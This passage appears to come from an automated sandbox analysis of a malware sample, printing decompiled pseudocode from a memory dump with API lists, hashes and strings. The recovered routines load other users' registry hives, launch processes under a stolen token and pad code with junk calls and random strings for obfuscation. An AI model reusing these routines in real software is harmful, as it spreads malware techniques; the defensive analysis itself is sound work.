					_t92 =  *0xef56c8; // 0x520f6c8
					 *((intOrPtr*)(_t92 + 0x30))(_v24);
					_v32 = 0;
					do {
						_t95 =  *0xef56c8; // 0x520f6c8
						_t128 =  *((intOrPtr*)(_t95 + 0x88))(_v16, _t126, 0x1000,  &_v32, 0);
						 *((char*)(_v32 + _t126)) = 0;
						_t98 = _v12;
						if(_t98 == 0) {
							_v12 = E00ECEA79(0, _t126);
						} else {
							_push(0);
							_push(_t126);
							_v40 = _t98;
							_v12 = E00ECE7FC(_t98);
							E00ECD1EA( &_v40, 0xffffffff);
							_t131 = _t131 + 0x14;
						}
					} while (_t128 != 0);
					if(IsTextUnicode(_v12, E00ECFE78(_v12),  &_v40) != 0) {
						L13:
						_t104 =  *0xef56c8; // 0x520f6c8
						 *((intOrPtr*)(_t104 + 0x30))(_v68);
						_t106 =  *0xef56c8; // 0x520f6c8
						 *((intOrPtr*)(_t106 + 0x30))(_v64);
						goto L14;
					}
					_t129 = E00ECEABC(_v12);
					if(_t129 == 0) {
						goto L13;
					}
					E00ECD1EA( &_v12, 0);
					return _t129;
				}
				L1:
				return 0;
			}

0x00ecde69
0x00ecde73
0x00ecde76
0x00ecde79
0x00ecde7c
0x00ecde7f
0x00ecde86
0x00ecde89
0x00ecde90
0x00ecde93
0x00ecde96
0x00ecdea0
0x00ecdea1
0x00ecdea2
0x00ecdea3
0x00ecdea6
0x00ecdebe
0x00ecded8
0x00ecdffd
0x00ece002
0x00ece00c
0x00ece011
0x00ece016
0x00ece016
0x00ece01c
0x00ece021
0x00ece026
0x00ece026
0x00000000
0x00ece029
0x00ecdede
0x00ecdee1
0x00ecdee4
0x00ecdeea
0x00ecdef4
0x00ecdefa
0x00ecdf01
0x00ecdf0a
0x00ecdf0d
0x00ecdf12
0x00000000
0x00000000
0x00ecdf17
0x00ecdf1e
0x00ecdf1f
0x00ecdf24
0x00ecdf25
0x00ecdf26
0x00ecdf2b
0x00ecdf2d
0x00ecdf2e
0x00ecdf2f
0x00ecdf32
0x00ecdf38
0x00000000
0x00000000
0x00ecdf41
0x00ecdf46
0x00ecdf4c
0x00ecdf51
0x00ecdf54
0x00ecdf57
0x00ecdf5c
0x00ecdf70
0x00ecdf75
0x00ecdf78
0x00ecdf7d
0x00ecdfa6
0x00ecdf7f
0x00ecdf7f
0x00ecdf80
0x00ecdf82
0x00ecdf8a
0x00ecdf93
0x00ecdf98
0x00ecdf98
0x00ecdfa9
0x00ecdfc6
0x00ecdfe7
0x00ecdfea
0x00ecdfef
0x00ecdff5
0x00ecdffa
0x00000000
0x00ecdffa
0x00ecdfd0
0x00ecdfd5
0x00000000
0x00000000
0x00ecdfdc
0x00000000
0x00ecdfe3
0x00ecdec0
0x00000000

APIs

memset.MSVCRT ref: 00ECDE96
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000080,?,00000000), ref: 00ECDEBA
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00ECDED4
IsTextUnicode.ADVAPI32(00EC8C43,00000000,?), ref: 00ECDFBE

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: CreatePipe$TextUnicodememset
String ID:
API String ID: 3251035996-0
Opcode ID: 6ce2cdab9601904d269e037ee830edf266979efd4756b5c92345185e7c700601
Instruction ID: 591525fc577cf44b1c332b81cebb206c404b121fc751569f3c26751bac7db674
Opcode Fuzzy Hash: 6ce2cdab9601904d269e037ee830edf266979efd4756b5c92345185e7c700601
Instruction Fuzzy Hash: CF51F4B6D04219AFDB10DFA9DD84EEEBBB8FB08304F51106AF515F6220D7329A458F60

Uniqueness

Uniqueness Score: -1.00%

Function 00EDE859, Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 18%

			E00EDE859(signed int __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				char _v28;
				signed int _t29;
				signed int _t31;
				signed int _t32;
				signed int _t33;
				char* _t34;
				signed int _t35;
				signed int _t41;
				signed int _t49;
				signed int _t52;
				signed int _t56;
				signed int _t57;
				signed int _t58;
				void* _t60;
				signed int _t62;
				signed int _t64;
				void* _t65;
				void* _t66;
				void* _t67;

				_t64 = __eax;
				_t29 = _a8("\"", 1, _a12);
				_t67 = _t66 + 0xc;
				if(_t29 == 0) {
					_t31 = _a4 + __eax;
					__eflags = _t31;
					_t62 = __eax;
					_t49 = __eax;
					_v12 = _t31;
					while(1) {
						L3:
						__eflags = _t49 - _v12;
						if(_t49 >= _v12) {
							goto L14;
						} else {
							goto L4;
						}
						while(1) {
							L4:
							_t35 = E00EDF3FA(_t62, _v12 - _t62,  &_v8);
							_t49 = _t35;
							_t67 = _t67 + 0xc;
							__eflags = _t49;
							if(_t49 == 0) {
								break;
							}
							_t32 = _v8;
							__eflags = _t32 - 0x5c;
							if(_t32 == 0x5c) {
								L15:
								__eflags = _t62 - _t64;
								if(_t62 == _t64) {
									L18:
									__eflags = _t49 - _t62;
									if(_t49 == _t62) {
										_t33 = _a8("\"", 1, _a12);
										L44:
										return _t33;
									}
									_t60 = 2;
									_t65 = 0xd;
									__eflags = _t32 - _t65;
									if(__eflags > 0) {
										__eflags = _t32 - 0x22;
										if(_t32 == 0x22) {
											_t34 = "\\\"";
											L40:
											_t35 = _a8(_t34, _t60, _a12);
											_t67 = _t67 + 0xc;
											__eflags = _t35;
											if(_t35 != 0) {
												break;
											}
											_t62 = _t49;
											_t64 = _t49;
											goto L3;
										}
										__eflags = _t32 - 0x2f;
										if(_t32 == 0x2f) {
											_t34 = "\\/";
											goto L40;
										}
										__eflags = _t32 - 0x5c;
										if(_t32 == 0x5c) {
											_t34 = "\\\\";
											goto L40;
										}
										L33:
										__eflags = _t32 - 0x10000;
										if(_t32 >= 0x10000) {
											_t41 = _t32 - 0x10000;
											_v8 = _t41;
											_t56 = _t41 & 0x000003ff | 0x0000dc00;
											__eflags = _t56;
											_push(_t56);
											_push((_t41 & 0x000ffc00 | 0x03600000) >> 0xa);
											_push("\\u%04X\\u%04X");
											_push(_t65);
											_push( &_v28);
											L00EDFD40();
											_t67 = _t67 + 0x14;
											_push(0xc);
										} else {
											_push(_t32);
											_push("\\u%04X");
											_push(_t65);
											_push( &_v28);
											L00EDFD40();
											_t67 = _t67 + 0x10;
											_push(6);
										}
										_pop(_t60);
										_t34 =  &_v28;
										goto L40;
									}
									if(__eflags == 0) {
										_t34 = "\\r";
										goto L40;
									}
									_t52 = _t32 - 8;
									__eflags = _t52;
									if(_t52 == 0) {
										_t34 = "\\b";
										goto L40;
									}
									_t57 = _t52 - 1;
									__eflags = _t57;
									if(_t57 == 0) {
										_t34 = "\\t";
										goto L40;
									}
									_t58 = _t57 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t34 = "\\n";
										goto L40;
									}
									__eflags = _t58 != _t60;
									if(_t58 != _t60) {
										goto L33;
									}
									_t34 = "\\f";
									goto L40;
								}
								_t35 = _a8(_t64, _t62 - _t64, _a12);
								_t67 = _t67 + 0xc;
								__eflags = _t35;
								if(_t35 != 0) {
									break;
								}
								_t32 = _v8;
								goto L18;
							}
							__eflags = _t32 - 0x22;
							if(_t32 == 0x22) {
								goto L15;
							}
							__eflags = _t32 - 0x20;
							if(_t32 < 0x20) {
								goto L15;
							}
							__eflags = _a16 & 0x00000400;
							if((_a16 & 0x00000400) == 0) {
								L10:
								__eflags = _a16 & 0x00000040;
								if((_a16 & 0x00000040) == 0) {
									L12:
									_t62 = _t49;
									__eflags = _t49 - _v12;
									if(_t49 < _v12) {
										continue;
									}
									goto L15;
								}
								__eflags = _t32 - 0x7f;
								if(_t32 > 0x7f) {
									goto L15;
								}
								goto L12;
							}
							__eflags = _t32 - 0x2f;
							if(_t32 == 0x2f) {
								goto L15;
							}
							goto L10;
						}
						_t33 = _t35 | 0xffffffff;
						__eflags = _t33;
						goto L44;
						L14:
						_t32 = _v8;
						goto L15;
					}
				}
				return _t29 | 0xffffffff;
			}

0x00ede863
0x00ede86c
0x00ede86f
0x00ede874
0x00ede882
0x00ede882
0x00ede885
0x00ede887
0x00ede889
0x00ede88c
0x00ede88c
0x00ede88c
0x00ede88f
0x00000000
0x00000000
0x00000000
0x00000000
0x00ede891
0x00ede891
0x00ede89c
0x00ede8a1
0x00ede8a3
0x00ede8a6
0x00ede8a8
0x00000000
0x00000000
0x00ede8ae
0x00ede8b1
0x00ede8b4
0x00ede8e5
0x00ede8e5
0x00ede8e7
0x00ede903
0x00ede903
0x00ede905
0x00ede9f7
0x00edea02
0x00000000
0x00edea03
0x00ede90d
0x00ede910
0x00ede911
0x00ede913
0x00ede957
0x00ede95a
0x00ede9d0
0x00ede9d5
0x00ede9da
0x00ede9dd
0x00ede9e0
0x00ede9e2
0x00000000
0x00000000
0x00ede9e4
0x00ede9e6
0x00000000
0x00ede9e6
0x00ede95c
0x00ede95f
0x00ede9c9
0x00000000
0x00ede9c9
0x00ede961
0x00ede964
0x00ede9c2
0x00000000
0x00ede9c2
0x00ede966
0x00ede96b
0x00ede96d
0x00ede986
0x00ede98a
0x00ede99d
0x00ede99d
0x00ede9a3
0x00ede9a7
0x00ede9a8
0x00ede9b0
0x00ede9b1
0x00ede9b2
0x00ede9b7
0x00ede9ba
0x00ede96f
0x00ede96f
0x00ede970
0x00ede978
0x00ede979
0x00ede97a
0x00ede97f
0x00ede982
0x00ede982
0x00ede9bc
0x00ede9bd
0x00000000
0x00ede9bd
0x00ede915
0x00ede950
0x00000000
0x00ede950
0x00ede919
0x00ede919
0x00ede91c
0x00ede946
0x00000000
0x00ede946
0x00ede91e
0x00ede91e
0x00ede91f
0x00ede93c
0x00000000
0x00ede93c
0x00ede921
0x00ede921
0x00ede922
0x00ede932
0x00000000
0x00ede932
0x00ede924
0x00ede926
0x00000000
0x00000000
0x00ede928
0x00000000
0x00ede928
0x00ede8f2
0x00ede8f5
0x00ede8f8
0x00ede8fa
0x00000000
0x00000000
0x00ede900
0x00000000
0x00ede900
0x00ede8b6
0x00ede8b9
0x00000000
0x00000000
0x00ede8bb
0x00ede8be
0x00000000
0x00000000
0x00ede8c0
0x00ede8c7
0x00ede8ce
0x00ede8ce
0x00ede8d2
0x00ede8d9
0x00ede8d9
0x00ede8db
0x00ede8de
0x00000000
0x00000000
0x00000000
0x00ede8e0
0x00ede8d4
0x00ede8d7
0x00000000
0x00000000
0x00000000
0x00ede8d7
0x00ede8c9
0x00ede8cc
0x00000000
0x00000000
0x00000000
0x00ede8cc
0x00ede9ff
0x00ede9ff
0x00000000
0x00ede8e2
0x00ede8e2
0x00000000
0x00ede8e2
0x00ede88c
0x00000000

Strings

\u%04X, xrefs: 00EDE970
\u%04X\u%04X, xrefs: 00EDE9A8

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: \u%04X$\u%04X\u%04X
API String ID: 0-1155366105
Opcode ID: 2d053be4a57b134e530d787b6bcdf6ece5bb6c0cc2aa3bcb96a040a45c0ae8d1
Instruction ID: c6ed3dd2e3493a0aeabdbbad4942087754d516479247f34bd5c992c6456923da
Opcode Fuzzy Hash: 2d053be4a57b134e530d787b6bcdf6ece5bb6c0cc2aa3bcb96a040a45c0ae8d1
Instruction Fuzzy Hash: E841F731A0125997CB24BA5D8D9EBBD3655DBC4724F2831B3F802FE381D571CD86A351

Uniqueness

Uniqueness Score: -1.00%

Function 00ECA05B, Relevance: 6.1, APIs: 4, Instructions: 130
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00ECA05B(void* __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				struct HDC__* _v8;
				short* _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v544;
				intOrPtr _t33;
				char _t34;
				short* _t36;
				intOrPtr _t42;
				intOrPtr _t48;
				char _t52;
				intOrPtr _t62;
				void* _t64;
				void* _t73;
				char* _t74;

				_t66 = __ecx;
				_t33 =  *0xef56a8; // 0xf00000
				_v8 = 0;
				_t34 = E00EC2A1B(_a8, 0,  *((intOrPtr*)(_t33 + 0xa0)));
				_v16 = _t34;
				if(_t34 != 0) {
					__imp__ConvertSidToStringSidW(_a4,  &_v8, _t73);
					_t36 = E00EC27B8(__ecx, 0x2d8);
					_push(0);
					_push(_t36);
					_t74 = "\\";
					_push(_t74);
					_v12 = _t36;
					_v20 = E00ECE9D2(_v8);
					E00ED0299( &_v12);
					E00EC436F(_t66, __esi, _a4,  &_v544, 0x104);
					_t42 =  *0xef56a8; // 0xf00000
					if(( *(_t42 + 0x1898) & 0x00000001) == 0) {
						_push(__esi);
						if(E00EC27D8(0x80000003, _v20, _v16) == 0xffffffff) {
							_t52 = E00ED3A82(_t66, 0xbe9);
							_push(0);
							_push(_t52);
							_v24 = _t52;
							_push(_t74);
							_v12 = E00ECE9D2( &_v544);
							E00ED0299( &_v24);
							Arc(0, 0x4e, 0x55, 0x1b, 0x12, 0x29, 0xe, 0x51, 0x1f);
							if(RegLoadKeyW(0x80000003, _v8, _v12) == 0) {
								E00EC27D8(0x80000003, _v20, _v16);
								_t62 =  *0xef56d4; // 0x520f880
								 *((intOrPtr*)(_t62 + 0x30))(0x80000003, _v8);
							}
							E00ECD1EA( &_v12, 0xfffffffe);
						}
					}
					E00ECD1EA( &_v20, 0xffffffff);
					BitBlt(0, 0x44, 0x1b, 0x19, 0x5f, 0, 2, 0x53, 0x5b);
					E00ECD1EA( &_v16, 0xffffffff);
					_t48 =  *0xef56c8; // 0x520f6c8
					 *((intOrPtr*)(_t48 + 0x34))(_v8);
					return 0;
				}
				_t64 = 0xfffffffe;
				return _t64;
			}

0x00eca05b
0x00eca064
0x00eca06c
0x00eca079
0x00eca081
0x00eca086
0x00eca098
0x00eca0a3
0x00eca0a8
0x00eca0a9
0x00eca0aa
0x00eca0af
0x00eca0b3
0x00eca0bb
0x00eca0c2
0x00eca0d6
0x00eca0db
0x00eca0ea
0x00eca0f0
0x00eca108
0x00eca10f
0x00eca114
0x00eca115
0x00eca116
0x00eca11f
0x00eca126
0x00eca12d
0x00eca146
0x00eca15b
0x00eca164
0x00eca169
0x00eca175
0x00eca175
0x00eca17e
0x00eca184
0x00eca185
0x00eca18c
0x00eca1a3
0x00eca1af
0x00eca1b4
0x00eca1be
0x00000000
0x00eca1c3
0x00eca08a
0x00000000

APIs

ConvertSidToStringSidW.ADVAPI32(00EC9A80,?), ref: 00ECA098
Arc.GDI32(00000000,0000004E,00000055,0000001B,00000012,00000029,0000000E,00000051,0000001F), ref: 00ECA146
RegLoadKeyW.ADVAPI32(80000003,?,00EC9A80), ref: 00ECA153
BitBlt.GDI32(00000000,00000044,0000001B,00000019,0000005F,00000000,00000002,00000053,0000005B), ref: 00ECA1A3

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ConvertLoadString
String ID:
API String ID: 337289462-0
Opcode ID: eae6b890d652e3e8215d6dffde2614e60edb88e0df187ff4aa957c7861542cbc
Instruction ID: ff782af93fcd9ad56cd5f547ac68b6f5543073da1a1c030a803a5bde4c89bbbe
Opcode Fuzzy Hash: eae6b890d652e3e8215d6dffde2614e60edb88e0df187ff4aa957c7861542cbc
Instruction Fuzzy Hash: 1D4190B294420CBFDB11ABA4DD8AFEE7BBCEB04324F140569F214BA1E1D6724B459B50

Uniqueness

Uniqueness Score: -1.00%

Function 00ECDC72, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00ECDC72(void* __edi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v8;
				int _v12;
				char _v16;
				char _v20;
				char _v52;
				intOrPtr _v112;
				void _v120;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t27;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t40;
				void* _t42;
				void* _t43;
				void* _t51;

				_t23 =  *0xef5740; // 0x520fc68
				_t24 =  *_t23;
				_v12 = 0;
				if(_t24 != 0) {
					_push( &_v8);
					_t47 = _a4;
					_push( *_a4);
					if( *_t24() != 0) {
						_v16 = 0;
						_t27 = E00ECE716(_v8, 1,  &_v16);
						_v20 = _t27;
						if(_t27 != 0) {
							_push(_a8);
							_push( *_t27);
							_t28 =  *0xef56d4; // 0x520f880
							if( *((intOrPtr*)(_t28 + 0x64))() != 0) {
								_t35 = E00ED3A82(_t47, 0x9e5);
								memset( &_v120, 0, 0x44);
								_push( &_v52);
								_push( &_v120);
								_t40 =  *0xef56c8; // 0x520f6c8
								_push(0);
								_push(0);
								_push(0x4000000);
								_push(0);
								_push(0);
								_push(0);
								_push(_a12);
								_v120 = 0x44;
								_push(0);
								_push(_v8);
								_v112 = _t35;
								if( *((intOrPtr*)(_t40 + 0x50))() != 0) {
									_v12 = 1;
								}
							}
							E00ECD1EA( &_v20, 0);
							L14:
							_t32 =  *0xef56c8; // 0x520f6c8
							 *((intOrPtr*)(_t32 + 0x30))(_v8);
							return _v12;
						}
						_t42 = E00ECFE78("du1h23");
						_t51 = 0xf;
						if(_t42 <= _t51) {
							_t51 = _t42;
						}
						_t43 = 0;
						if(_t51 > 0) {
							do {
								_t43 = _t43 + 1;
							} while (_t43 < _t51);
						}
						goto L14;
					}
					GetLastError();
				}
				return 0;
			}

0x00ecdc78
0x00ecdc7d
0x00ecdc82
0x00ecdc87
0x00ecdc93
0x00ecdc94
0x00ecdc97
0x00ecdc9d
0x00ecdcb0
0x00ecdcb3
0x00ecdcbb
0x00ecdcc0
0x00ecdce3
0x00ecdce6
0x00ecdce8
0x00ecdcf2
0x00ecdcfa
0x00ecdd08
0x00ecdd13
0x00ecdd17
0x00ecdd18
0x00ecdd1d
0x00ecdd1e
0x00ecdd1f
0x00ecdd24
0x00ecdd25
0x00ecdd26
0x00ecdd27
0x00ecdd2a
0x00ecdd31
0x00ecdd32
0x00ecdd35
0x00ecdd3e
0x00ecdd40
0x00ecdd40
0x00ecdd3e
0x00ecdd4c
0x00ecdd53
0x00ecdd56
0x00ecdd5b
0x00000000
0x00ecdd5e
0x00ecdcc7
0x00ecdccf
0x00ecdcd2
0x00ecdcd4
0x00ecdcd4
0x00ecdcd6
0x00ecdcda
0x00ecdcdc
0x00ecdcdc
0x00ecdcdd
0x00ecdce1
0x00000000
0x00ecdcda
0x00ecdc9f
0x00ecdc9f
0x00000000

APIs

GetLastError.KERNEL32 ref: 00ECDC9F

Part of subcall function 00ECE716: GetTokenInformation.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00001644,?,?,?,00ECE3C8,00000000,00000001,00000000,00001644), ref: 00ECE731
Part of subcall function 00ECE716: GetLastError.KERNEL32(?,?,?,00ECE3C8,00000000,00000001,00000000,00001644,?,?,?,00ECF066,00000000), ref: 00ECE737

memset.MSVCRT ref: 00ECDD08

Strings

du1h23, xrefs: 00ECDCC2
D, xrefs: 00ECDD2A

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$InformationTokenmemset
String ID: D$du1h23
API String ID: 898169725-228793401
Opcode ID: dd7476e15cd965f3991d53e62d4b9a78f3c08869e681d7060f445a27abc2b03d
Instruction ID: d405c84418053a8e378de876d4c45f164f7d84ffcb84b86d3739161010614fe2
Opcode Fuzzy Hash: dd7476e15cd965f3991d53e62d4b9a78f3c08869e681d7060f445a27abc2b03d
Instruction Fuzzy Hash: 20318F72A04218AFCB21EBA1DD49EEE7FB8EF44750F201529F505F6151E7729A01CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EDC405, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00EDC405(void* __ecx) {
				char _v8;
				char _v12;
				char _v13;
				char _v28;
				char _v64;
				short _v92;
				char _v156;
				void* _t17;
				intOrPtr _t18;
				void* _t20;
				intOrPtr _t21;
				char _t27;
				intOrPtr _t29;
				void* _t35;
				void* _t42;
				void* _t44;
				void* _t50;
				void* _t52;
				intOrPtr _t57;
				intOrPtr _t58;

				_t44 = __ecx;
				_v8 = 0;
				_t57 =  *0xef5668; // 0x0
				if(_t57 == 0) {
					_t18 =  *0xef56a8; // 0xf00000
					_t20 = E00EDC2E2(_t18 + 0x228, 0, _t18 + 0x228, 1);
					_t58 =  *0xef5660; // 0x0
					if(_t58 == 0) {
						L8:
						 *0xef5668 = 1;
						return _t20;
					}
					_t21 =  *0xef56a8; // 0xf00000
					E00ECE9A5( &_v156, 6, 0xa, _t21 + 0x648);
					E00ECD177( &_v64, "1mGL,sCVP3 HBfuclqW9IdfgWuyTc 8 XXvUl3DmQCI .r5rrRRUNc3cy YJmg NGoKroWwucrEZtbEbrG4IFlS,aQWP89IxU8AsHhZg8fLva33iN4KPD3hmelI6n3Zw7CBINv Ls9ZAbb8DxYzWs.X17iHj7feo1wiops1brcfYO3ecD,hL ThcZNY.EVxuM gdd NX.uP uLZ0HKERlfucT 0vqiZMlhA1xAyE9SkgBXGeNnM3aicm5x7wTh1shckBiB P.bP0ZLSZ0UTcuV4WLfQnheeCoO9nbrsXrmm2jZu3envCcN8 c3bVvi1IqajvliYhWFgH33mGSz.UHc 21Cz Vp9tlIpiPme9adIno2l3h6t4rLfM0 Iaees2e1N0dVbwElIPoN,Pyk9lvZ 3cfWILHE9m7QecFnJIjr9MXw uRFsCU375U5M6,Q8SD4dTHbNqKnFgWI322ob9MqB 4 VBhjd8ieObt1AB6ks 5buru3Hhs36PByxhRa7V1Itb l IOB0MEOD0t87oFq1SMgpyO5GRyD3l aLyKez.0v0U1ovCmuy1F7Nlf0KF3ZIuxW6VvcoFv Amecv6MdDc FtyY7ZijDmkpGPucXDa,,Ttk3yg4l46JyhQE0b52O97vgoM7lOPbZFdhj8fX.i8qQTTf3nXzPcJz7wwnAHcif G2N6 aPxeDcJfoQy V mMZpyL02R,s.Prh KfHm2oPIsA XZ2ebWiM7hn28l1 cGI Ab rU0f4F7.dLppfBzcqQHpbe 3iy0Uv8jeusZjFshP2vnZkqJOpE.uEb7oLncUOW3i9YK3ss38HnV2QKATadwMf52A9bXCLX.dNxTW4mjWR4 MHISgqk5iwek.eP2tujbMJ3Ld8x9E6oE2qbADvKUNOV3TUX zX0rxrz7jNKdB EdfQId3Cz4EPRw2fqK0fQae 51,4OmswakP,4eMgWvVZ4ZKpq9JdxAAIOKzYC1lmAly2 Xx,ElRUrDUS2WHIBe7KvIIc.rWGZL98.HP3xOIZZ4ENgenXFD8o8nXE NQZ.D9ukNT,Pdh H 7G03hjzG9TW4U PY WPKkvJezDc2 mUBkXgt0W eYo7pNc0HnI2d2eH4dtaNOwg6 FUsi5WSTj RRutvGYmd7dNRXyCUqYtZn9IJ2t7dXZ6lxfX7nrOPPKdhLYnB. uqw.8I7,v75N8O V9,SpZeJyKG2G LXSwdDDLRJLyWw.US3 .8iZ1v.rOMviphlxk rqvsEjR4N6 Jes1T,cEh2Pdo91Zg9Jzl utUZiUD NdvOIjt0kYbygU8UG qFIabRc6 CwnqiE2jNG9BCIouSTkn3n3wB34MpXhrP6f823JPtm0cSXJIbcBS9 Jfq OHK8EQO 3xBFEAv7tQBG4c6VdldjI Mgmasn9sKDfC74fa06EbJ CtMpWvjKTTH UwJDO7VpHD3 bCoZNOKy66h9wQ1156OleTWNj4T9Vk5Xbb ,3wvc40UKKLJJIhm3sz3dFCnRLnd5cmMnA VPw52r1eEr f5 wI k 5zhelmp7EG5G7u6CRdXtivTOZigz0iGXbu2 JINgiwSdKQxMHAm1 ZrDHN iVJr1RTnEP S3iGskVEF F llbtSQMccGINSWOW6IGk I c5TRKzZXwsipAAPpXrJ1Pu.Dn LSoD9jyA63LHc6woP3,w40Rb5Y9n3xzQ5D 8lLyI9t5yIPm OYze Hpj6JX0gWu 9vNwA1pcJavLOEJj  Oz2j2sWuCdpsRty7,wq WANLtdQNqIB .2NQadGcv", 0x17);
					_t27 = E00ED3A82(_t44, 0x6b5);
					_push(0);
					_push(_t27);
					_v12 = _t27;
					_push( &_v156);
					_t29 =  *0xef56a8; // 0xf00000
					_push("\\");
					_v8 = E00ECE9D2(_t29 + 0x438);
					_t20 = E00ED0299( &_v12);
					if(_v8 == 0) {
						goto L8;
					}
					E00EDC2E2(_t20, 1, _v8, 1);
					GetLastError();
					_t35 = E00ECFE78("DO3fs7mmbWYf8QAoicEJkYEG KFXHag7 0Z0hsW");
					_t50 = 0xf;
					if(_t35 <= _t50) {
						_t50 = _t35;
					}
					_t42 = 0;
					_v13 = 0;
					if(_t50 <= 0) {
						L7:
						_t20 = E00ECD1EA( &_v8, 0xfffffffe);
						goto L8;
					} else {
						do {
							_t11 = _t42 + 0x42; // 0x42
							 *((char*)(_t52 + _t42 - 0x18)) = _t11;
							MultiByteToWideChar(0, 0,  &_v28, 0xffffffff,  &_v92, 0x20);
							_t42 = _t42 + 1;
						} while (_t42 < _t50);
						goto L7;
					}
				}
				return _t17;
			}

0x00edc405
0x00edc411
0x00edc414
0x00edc41a
0x00edc420
0x00edc42e
0x00edc436
0x00edc43c
0x00edc510
0x00edc510
0x00000000
0x00edc510
0x00edc442
0x00edc458
0x00edc468
0x00edc472
0x00edc477
0x00edc478
0x00edc479
0x00edc482
0x00edc483
0x00edc48d
0x00edc498
0x00edc49f
0x00edc4aa
0x00000000
0x00000000
0x00edc4b5
0x00edc4bd
0x00edc4c8
0x00edc4d0
0x00edc4d3
0x00edc4d5
0x00edc4d5
0x00edc4d7
0x00edc4d9
0x00edc4df
0x00edc501
0x00edc507
0x00000000
0x00edc4e1
0x00edc4e1
0x00edc4e3
0x00edc4e6
0x00edc4f6
0x00edc4fc
0x00edc4fd
0x00000000
0x00edc4e1
0x00edc4df
0x00edc51c

APIs

Part of subcall function 00ECE9D2: lstrcatW.KERNEL32(00000000,00000000), ref: 00ECEA12

GetLastError.KERNEL32 ref: 00EDC4BD
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00EDC4F6

Strings

DO3fs7mmbWYf8QAoicEJkYEG KFXHag7 0Z0hsW, xrefs: 00EDC4C3
1mGL,sCVP3 HBfuclqW9IdfgWuyTc 8 XXvUl3DmQCI .r5rrRRUNc3cy YJmg NGoKroWwucrEZtbEbrG4IFlS,aQWP89IxU8AsHhZg8fLva33iN4KPD3hmelI6n3Zw7CBINv Ls9ZAbb8DxYzWs.X17iHj7feo1wiops1brcfYO3ecD,hL ThcZNY.EVxuM gdd NX.uP uLZ0HKERlfucT 0vqiZMlhA1xAyE9SkgBXGeNnM3aicm5x7wTh1shckB, xrefs: 00EDC462

Memory Dump Source

Source File: 00000005.00000002.984573064.0000000000EC0000.00000040.00000001.sdmp, Offset: 00EC0000, based on PE: true

Yara matches

Similarity

API ID: ByteCharErrorLastMultiWidelstrcat
String ID: 1mGL,sCVP3 HBfuclqW9IdfgWuyTc 8 XXvUl3DmQCI .r5rrRRUNc3cy YJmg NGoKroWwucrEZtbEbrG4IFlS,aQWP89IxU8AsHhZg8fLva33iN4KPD3hmelI6n3Zw7CBINv Ls9ZAbb8DxYzWs.X17iHj7feo1wiops1brcfYO3ecD,hL ThcZNY.EVxuM gdd NX.uP uLZ0HKERlfucT 0vqiZMlhA1xAyE9SkgBXGeNnM3aicm5x7wTh1shckB$DO3fs7mmbWYf8QAoicEJkYEG KFXHag7 0Z0hsW
API String ID: 3522955816-915090606
Opcode ID: d290ac221c4ae4e9b4c466804ee4935ebd92667c43ef291b7914bcb82c2816da
Instruction ID: 150d1b6397dc224e6975de77a4e547d004258e18c6f5655e83eb3106b840b9d8
Opcode Fuzzy Hash: d290ac221c4ae4e9b4c466804ee4935ebd92667c43ef291b7914bcb82c2816da
Instruction Fuzzy Hash: C531D472940208BEDB11EBE5DC86FAE77BCEB50750F201126F214F6291E6B29685C751

Uniqueness

Uniqueness Score: -1.00%

Function 00EDFCBF, Relevance: 6.0, APIs: 4, Instructions: 38
threadCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00EDFCBF(signed int _a4) {
				signed int _t9;
				signed int _t10;
				signed int _t15;

				_t9 =  *0xef5674; // 0x0
				_t15 = _a4;
				if(_t9 == 0) {
					_t10 = InterlockedIncrement(0xef5678);
					if(_t10 != 1) {
						goto L9;
					} else {
						if(_t15 == 0) {
							_t10 = E00EDFC17( &_a4);
							if(_t10 != 0) {
								_push(_t15);
								L00EDFD64();
								_a4 = _t10;
								_t10 = GetCurrentProcessId();
								_a4 = _a4 ^ _t10;
							}
							if(_a4 == 0) {
								_a4 = 1;
							}
							_t15 = _a4;
						}
						 *0xef5674 = _t15;
						return _t10;
					}
					do {
						goto L9;
					} while (_t9 == 0);
					goto L10;
					L9:
					SwitchToThread();
					_t9 =  *0xef5674; // 0x0
				}
				L10:
				return _t9;
			}

0x00edfcc2
0x00edfcc8
0x00edfccd
0x00edfcd4
0x00edfcdd
0x00000000
0x00edfcdf
0x00edfce1
0x00edfce7
0x00edfcef
0x00edfcf1
0x00edfcf2
0x00edfcf8
0x00edfcfb
0x00edfd01
0x00edfd01
0x00edfd08
0x00edfd0a
0x00edfd0a
0x00edfd11
0x00edfd11
0x00edfd14
0x00000000
0x00edfd14
0x00edfd1c
0x00000000
0x00000000
0x00000000
0x00edfd1c
0x00edfd1c
0x00edfd22
0x00edfd27
0x00edfd2d
0x00edfd2d

APIs

